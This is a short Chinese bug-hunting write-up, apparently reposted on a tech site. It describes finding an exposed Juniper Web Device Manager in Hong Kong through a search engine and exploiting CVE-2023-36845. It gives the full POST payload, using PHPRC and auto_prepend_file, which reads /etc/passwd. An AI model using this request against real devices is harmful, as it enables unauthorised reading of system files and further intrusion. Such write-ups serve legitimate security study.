记src

编程入门 行业动态 更新时间:2024-10-27 10:21:54

src="/uploads/image/0724.jpg" alt="记src"/>

记src

一、hunter搜索web.title=”Juniper Web Device Manager”,查找到香港的一处资产。

二、访问相关网页,界面就是Juniper登录界面。

三、根据编号为CVE-2023-36845的利用方法,抓包,修改提交方式,成功读取到文件。

原始包如下:
 


payload如下:

POST /?PHPRC=/dev/fd/0 HTTP/1.1Host: {{Hostname}}Content-Type: application/x-www-form-urlencodedauto_prepend_file="/etc/passwd"

修改传参方式,并按照上述payload在路径后面拼接上”?PHPRC=/dev/fd/0”,请求体中加入auto_prepend_file参数。结果如下:

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

没看够~?欢迎关注!

+V【zkaq222】或者下面的扫码不然通不过哦,免费领取安全学习资料包!(私聊进群一起学习,共同进步)腾讯文档-在线文档

更多推荐

记src

本文发布于:2023-12-03 06:46:34,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1652299.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:src

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!